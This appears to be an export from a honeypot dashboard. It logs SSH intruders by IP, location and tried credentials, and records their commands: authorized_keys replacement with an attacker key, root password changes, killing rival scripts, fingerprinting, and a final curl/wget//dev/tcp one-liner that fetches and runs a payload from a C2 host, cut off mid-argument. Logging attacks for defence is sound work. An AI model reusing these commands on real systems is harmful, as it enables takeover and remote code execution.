🎭 silk_root_17 (117.50.213.145) β€” Beijing, China Β· 2 sessions Β· 2 cmds
2026-05-12 20:30 EDT Β· as root/---fuck_you----
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m Γ—2
🎭 eagle_root_31 (216.36.108.151) β€” Pleasanton, United States Β· 2 sessions Β· 4 cmds
2026-05-24 17:50 EDT Β· as curl/welltech12, root/aaa111
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 phantom_root_66 (103.59.160.242) β€” Kediri, Indonesia Β· 3 sessions Β· 6 cmds
2026-05-24 17:12 EDT Β· as curl/welltech12, root/Ai123456, root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 windmill_root_8 (82.169.135.117) β€” Someren, Netherlands Β· 3 sessions Β· 6 cmds
2026-05-24 17:09 EDT Β· as appuser/1qaz@WSX, curl/welltech12, root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 wraith_root_62 (182.191.77.164) β€” Sialkot, Pakistan Β· 2 sessions Β· 22 cmds
2026-05-24 16:46 EDT Β· as root/fjbdfdjkdsfs541544AA@@, strapi/strapi
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "strapi\nSR0z89Ya0eWb\nSR0z89Ya0eWb"|passwd|bash
$ Enter new UNIX password:
$ echo "strapi\nSR0z89Ya0eWb\nSR0z89Ya0eWb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_67 (165.154.6.138) β€” Hong Kong, Hong Kong Β· 4 sessions Β· 42 cmds
2026-05-23 17:51 EDT Β· as curl/welltech12, root/1q2w3e$R, root/Root123456@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:rH30chJN7Ubo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ADckIhxH0pdM"|chpasswd|bash
🎭 wok_root_17 (14.103.103.211) β€” Beijing, China Β· 1 session Β· 2 cmds
2026-05-24 16:55 EDT Β· as root/Ai123456
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cipher_root_58 (202.52.252.13) β€” Singapore, Singapore Β· 1 session Β· 2 cmds
2026-05-24 16:54 EDT Β· as root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 eagle_root_32 (198.144.189.85) β€” Buffalo, United States Β· 1 session Β· 2 cmds
2026-05-24 16:51 EDT Β· as root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 crepe_root_10 (45.95.233.88) β€” Paris, France Β· 3 sessions Β· 57 cmds
2026-05-24 15:41 EDT Β· as root/1337, root/Root#123, root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:H7WnaCKBnAcd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:6XZQiPNDGILK"|chpasswd|bash
$ echo "root:Mv06XU2ANeiH"|chpasswd|bash
🎭 specter_root_62 (190.148.112.242) β€” Guatemala City, Guatemala Β· 2 sessions Β· 38 cmds
2026-05-24 15:42 EDT Β· as root/Root#123, root/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:5kd1cTELBXBP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:owAaJGycGmdy"|chpasswd|bash
🎭 cipher_root_27 (42.200.66.164) β€” South Wave Court, Hong Kong Β· 2 sessions Β· 40 cmds
2026-05-24 15:22 EDT Β· as test/test@2024, uno50/uno50
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "uno50\nr1eE5PdxJ6dy\nr1eE5PdxJ6dy"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "uno50\nr1eE5PdxJ6dy\nr1eE5PdxJ6dy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "test@2024\nCmoS02XwFsEc\nCmoS02XwFsEc"|passwd|bash
$ echo "test@2024\nCmoS02XwFsEc\nCmoS02XwFsEc\n"|passwd
🎭 chai_root_16 (103.5.184.213) β€” Mumbai, India Β· 1 session Β· 1 cmd
2026-05-24 16:08 EDT Β· as root/Test@2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 lantern_root_24 (115.190.166.75) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-05-24 15:51 EDT Β· as informix/Password@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Password@123\nguKE3dler63F\nguKE3dler63F"|passwd|bash
$ Enter new UNIX password:
$ echo "Password@123\nguKE3dler63F\nguKE3dler63F\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_7 (103.158.29.100) β€” Kowloon Bay, Hong Kong Β· 1 session Β· 20 cmds
2026-05-24 15:12 EDT Β· as uno50/uno50
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "uno50\nEpU6G5XX0exZ\nEpU6G5XX0exZ"|passwd|bash
$ Enter new UNIX password:
$ echo "uno50\nEpU6G5XX0exZ\nEpU6G5XX0exZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_root_10 (222.118.59.16) β€” Asan, South Korea Β· 1 session Β· 20 cmds
2026-05-24 14:55 EDT Β· as xuhao/xuhao
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "xuhao\nC5A5rXHYLe2C\nC5A5rXHYLe2C"|passwd|bash
$ Enter new UNIX password:
$ echo "xuhao\nC5A5rXHYLe2C\nC5A5rXHYLe2C\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_56 (222.167.161.11) β€” Tsuen Wan, Hong Kong Β· 3 sessions Β· 58 cmds
2026-05-22 02:00 EDT Β· as root/123456@Abc, root/walter, testuser/123123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123123\nCGRSRCGOifLR\nCGRSRCGOifLR"|passwd|bash
$ Enter new UNIX password:
$ echo "123123\nCGRSRCGOifLR\nCGRSRCGOifLR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:RYcdra36XyQk"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:WB3QIpo09VCY"|chpasswd|bash
🎭 lantern_root_25 (47.114.83.167) β€” Hangzhou, China Β· 1 session Β· 3 cmds
2026-05-24 14:21 EDT Β· as root/12345
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://49.233.248.57:6639/linux -o /tmp/beIWSOkJLO; if [ ! -f /tmp/beIWSOkJLO ]; then wget http://49.233.248.57:6639/linux -O /tmp/beIWSOkJLO; fi; if [ ! -f /tmp/beIWSOkJLO ]; then exec 6<>/dev/tcp/49.233.248.57/6639 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/beIWSOkJLO ; chmod +x /tmp/beIWSOkJLO && /tmp/beIWSOkJLO KeDp0CJbXTzO7fVXSvfo2jpaWzzV//FcUe7u1T1EWzjW8fJUUvrn1jhbSj3Q6e5TUO7t0SJYWTva6fBVVPX/1DtEUjrO7vdSSvLv2TZcWj3T7OBVUfLx0T9cRD7S6O5VVvbl2D9eXizR5/BKU/bx0T9dRD/X5fZUVfPqwD1aXCLR7e5VUvHx0TpTUDvW5/JEUPfx0T5bRD3Y6+5VV/jl2TRYWSzR6vRKXPPx0j1bRD7T5fldV/T/2CJYWzTO7fJRSvTt2jpaWzzR//RTSvLr0iJfUiLY6/pSVPHv2SxSRD7R6O5WVPPx0j9SUDvV7fFEVfHtzj1YXiLT7O5cU/rp0D1eXSzU5u5WV/Px0jhSRDnX5fZSV/n/1DtEUzXO7vlTSvLr2DZcUj/W//RTSvHu1CJSWSLR6fdeU/Lv1CxcWiLR6PBKVvXszjtdUDrQ7vBRRPHn1SJbXz3O7vRSSvLv1jZSXDjR//JUVu7m0SJYXjzO7vReUvHs0ixeXSLR7fFKVfjrzj1ZUjbZ5/JXRPHq1CJSWSLS7vFKVvPl2TVZXizR7/ZKU/Tx0j1EWD/X5fZUVfDqwDhdRDXZ8fFdU+7t1DRQXDTT6eBQU+7t0zVEWzvR8fFVXPro1TpfSj3R6e5VUvnx1TREWDzS5fZQVvn/0TlYRD3T6e5WVvfx0T5cUDTT6/REUPfx0j9TRD7O7fReXPnv0yxeXSLY6e5VU/bx0jxTUDrQ7vNXRPHu0iJbWDjO7PNKXPfl1jxbXjvA6/dKVvTtzjlSRDTU